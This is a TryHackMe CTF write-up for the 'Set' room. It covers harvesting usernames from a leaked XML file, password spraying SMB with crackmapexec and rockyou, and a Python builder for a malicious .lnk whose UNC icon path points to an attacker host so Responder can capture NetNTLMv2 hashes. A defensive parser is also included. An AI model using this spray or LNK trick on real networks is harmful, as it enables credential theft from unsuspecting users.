Set (THM)

TryHackMe Set Write-Up

topics: Web Application attacks, OWASP Top 10 (Broken Authentication), Active Directory, Windows Privilege Escalation

  1. Enumeration

  2. Local Privilege Escalation

  3. System Privilege Escalation

new tools: rpcdump, smbrute.py

Set is used as a platform for developers and has had some problems in the recent past. They had to reset a lot of users and restore backups (maybe you were not the only hacker on their network?). So they decided to make sure all users used proper passwords and closed off some of the loose policies. Can you still find a way in? Are some users more privileged than others? Or some more sloppy? And maybe you need to think outside the box a little bit to circumvent their new security controls.

Enumeration

Initial nmap scan: .././autonmap.sh $ip Basic

The scan shows MSRPC, HTTPS and SMB open, and its script output tells us to add set.windcorp.thm to our hosts file. Windows Remote Management is also listening on 5985, with a second MSRPC endpoint on 49666. Let's look at the website first and then move on to SMB.

HTTPS

Navigating to the homepage of the HTTPS site returns a company website

A quick dirsearch scan turned up nothing but 403 (forbidden) directories, so we can either browse the website by hand or enumerate those directories further.

python3 dirsearch.py -u https://set.windcorp.thm/assets -e php,html,txt

These appear to be the directories that host the website's static source, so we can snoop around the files in the browser's debugger. Within the page source there is a hidden testimonials section containing usernames. The room hint says the company was previously hacked, which makes those usernames valuable.

There is a section highlighting team members with their full names being exposed which almost certainly will be of use.

Scrolling further, there appears to be a contact section with a search bar

We know of at least ten names associated with the company from the website, so let's try searching for the CEO, Max.

This is an interesting revelation: the contact information and username of every user of the website is leaked through the search bar. Inspecting the JavaScript files loaded by the page reveals "assets/data/users.xml", an XML user file within the assets directory.

This file contains many usernames belonging to the company.

We can filter this file to obtain only the usernames and then brute force valid accounts on the Set domain. The following command downloads the XML file, extracts the local part of each email address, deletes empty lines and stores the result in a text file (the original one-liner fetched the homepage instead of the XML file and piped curl's empty output into cat):

curl -sk https://set.windcorp.thm/assets/data/users.xml -o user.xml && awk -v FS="(<email>|@windcorp.thm</email>)" '{print $2}' user.xml | sed -r '/^\s*$/d' > user.txt
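An added example (not part of the original write-up) that does the same extraction with a real XML parser instead of awk field splitting, so it also copes with whitespace, mixed case, empty elements, duplicates and addresses outside the target domain. The users.xml layout below is constructed for the example; only the <email> elements are known from the page.

```python
import xml.etree.ElementTree as ET
from typing import List, Set

# Constructed stand-in for assets/data/users.xml; the real file's layout is
# not reproduced on this page, only the <email> elements matter here.
SAMPLE_USERS_XML = """<?xml version="1.0" encoding="UTF-8"?>
<users>
  <user><name>Max Wind</name><email>maxwind@windcorp.thm</email></user>
  <user><name>Myrtle Owe</name><email> MyrtleOwe@WindCorp.thm </email></user>
  <user><name>Duplicate Entry</name><email>maxwind@windcorp.thm</email></user>
  <user><name>No Mailbox</name><email></email></user>
  <user><name>External Contractor</name><email>someone@example.com</email></user>
</users>
"""


def extract_usernames(xml_text: str, domain: str = "windcorp.thm") -> List[str]:
    """Return the unique, lower-cased local parts of every <email> in the
    given domain, in document order. Whitespace, mixed case, empty elements,
    duplicates and other domains are tolerated or skipped, which the awk
    one-liner does not do."""
    root = ET.fromstring(xml_text)
    seen: Set[str] = set()
    users: List[str] = []
    for node in root.iter("email"):
        addr = (node.text or "").strip().lower()
        local, sep, dom = addr.rpartition("@")
        if not sep or not local or dom != domain.lower():
            continue  # empty element, malformed address or foreign domain
        if local not in seen:
            seen.add(local)
            users.append(local)
    return users


if __name__ == "__main__":
    # Usage (hypothetical filename):
    #   curl -sk https://set.windcorp.thm/assets/data/users.xml | python3 extract_users.py > user.txt
    # With no piped input the constructed sample is used instead.
    import sys
    text = SAMPLE_USERS_XML if sys.stdin.isatty() else sys.stdin.read()
    print("\n".join(extract_usernames(text)))
```

The normalisation matters for the next step: crackmapexec treats usernames case-insensitively, but a duplicate entry in user.txt doubles the number of login attempts against that account.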

SMB

A quick smbclient scan shows that we need credentials to enumerate SMB.

We can brute force valid accounts with the usernames we acquired from the website using crackmapexec and a wordlist such as rockyou or the common SSH password list. Note that crackmapexec stops at the first valid login unless you add --continue-on-success, and in a real environment a spray of this size should only be run after checking the domain's lockout threshold.

crackmapexec smb set.windcorp.thm -u user.txt -p /root/payloads/rockyou.txt

We can see the valid credentials are myrtleowe:Passw@rd

Listing the shares with the newly found credentials:

smbclient -L //set.windcorp.thm -U myrtleowe

If we logon to the Files share we see the following.

The Info.txt file contains the first flag of the room. We do not yet have access via evil-winrm.

MSRPC

I experimented with the tool rpcdump from impacket.

Nothing of note compared to the list on HackTricks; I'll come back to this if nothing turns up on the website.

It was at this point that I was lost. We had extracted what we needed for SMB access, and enumeration over MSRPC was not successful as I was disconnected each time I tried to use enumdomusers and basically every other useful command. I needed some help.

The write-up taught me something I hadn't heard of until now. The only piece of information we had left was that users were instructed to zip their projects and leave them in the Files share.

Apparently we can set the icon path of an LNK (shortcut) file to a UNC path on an SMB server we control. When a user's Explorer renders the shortcut it connects to that server to fetch the icon and authenticates automatically, so we capture the user's NetNTLMv2 response, which can then be cracked offline. This can be done with Responder and a tool called mslink.

Results

Port/Service   Result
MSRPC          disconnected each time I tried to enumerate
HTTPS          found 120 usernames in an XML file hidden on the website
SMB            brute-forced a valid username; led to the first flag and a message to unzip a certain file

Local Privilege Escalation

We can use the mslink bash script to create a .lnk shortcut file, zip it and drop it in the Files share.

I have to revisit this technique; it is not working properly.
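An added example of the LNK trick explained in the Enumeration section and used in the step above. This is not from the original write-up and not mslink's script: it writes the minimal structure from MS-SHLLINK (a ShellLinkHeader with HasIconLocation set, an ICON_LOCATION string naming a UNC path, and the terminal block) and pairs it with a parser that pulls the icon path back out of any .lnk, which is the check a blue team would run on shortcuts found in a share. The attacker address 10.10.14.5 and the file names are assumptions. mslink additionally writes a target ID list; this minimal link has no target, so it assumes Explorer resolves the icon from the string alone.

```python
import struct
from typing import Optional

# Constants from MS-SHLLINK (Shell Link Binary File Format), section 2.1.
HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData entries always appear in this order when their flag is set.
STRING_DATA_ORDER = (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION)
SW_SHOWNORMAL = 1


def build_icon_lnk(icon_path: str, icon_index: int = 0, unicode: bool = True) -> bytes:
    """Emit a minimal shell link: header + ICON_LOCATION string + terminal block.
    No target is written; the only thing Explorer resolves when drawing the icon
    is icon_path, so a UNC path there makes the viewer authenticate to that host."""
    flags = HAS_ICON_LOCATION | (IS_UNICODE if unicode else 0)
    header = struct.pack(
        "<I16sIIQQQIiIHHII",
        HEADER_SIZE, LNK_CLSID, flags,
        0,              # FileAttributes
        0, 0, 0,        # Creation/Access/Write FILETIME (zero = unset)
        0,              # FileSize
        icon_index,     # IconIndex
        SW_SHOWNORMAL,  # ShowCommand
        0, 0, 0, 0,     # HotKey, Reserved1, Reserved2, Reserved3
    )
    encoded = icon_path.encode("utf-16-le" if unicode else "cp1252")
    string_data = struct.pack("<H", len(icon_path)) + encoded  # CountCharacters + chars, no terminator
    terminal_block = struct.pack("<I", 0)                       # ExtraData: TerminalBlock
    return header + string_data + terminal_block


def icon_location(blob: bytes) -> Optional[str]:
    """Parse a .lnk and return its ICON_LOCATION string, or None if absent.
    Skips the optional LinkTargetIDList and LinkInfo structures and walks
    StringData in spec order, so it also handles links that carry a target."""
    if len(blob) < HEADER_SIZE or blob[:4] != b"\x4c\x00\x00\x00" or blob[4:20] != LNK_CLSID:
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", blob, 20)[0]
    off = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:
        off += 2 + struct.unpack_from("<H", blob, off)[0]  # IDListSize + IDList
    if flags & HAS_LINK_INFO:
        off += struct.unpack_from("<I", blob, off)[0]      # LinkInfoSize includes itself
    width = 2 if flags & IS_UNICODE else 1
    found = None
    for flag in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", blob, off)[0]
        raw = blob[off + 2: off + 2 + count * width]
        off += 2 + count * width
        if flag == HAS_ICON_LOCATION:
            found = raw.decode("utf-16-le" if width == 2 else "cp1252")
    return found


def remote_icon_host(blob: bytes) -> Optional[str]:
    """Defender-side check: the host a victim's Explorer would authenticate to
    when rendering this shortcut, or None when the icon path is local."""
    loc = icon_location(blob)
    if loc and loc.startswith("\\\\"):
        return loc[2:].split("\\", 1)[0]
    return None


if __name__ == "__main__":
    # 10.10.14.5 is an assumed attacker address where Responder is listening.
    with open("project.lnk", "wb") as fh:
        fh.write(build_icon_lnk(r"\\10.10.14.5\share\project.ico"))
```

Start Responder on the attacking interface (responder -I <iface>) before placing project.lnk in the Files share; the NetNTLMv2 response Responder logs when someone browses the share is what gets cracked offline. remote_icon_host is the same parse from the other side: run it over every .lnk in a share to find shortcuts whose icon points off-host.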


System Privilege Escalation

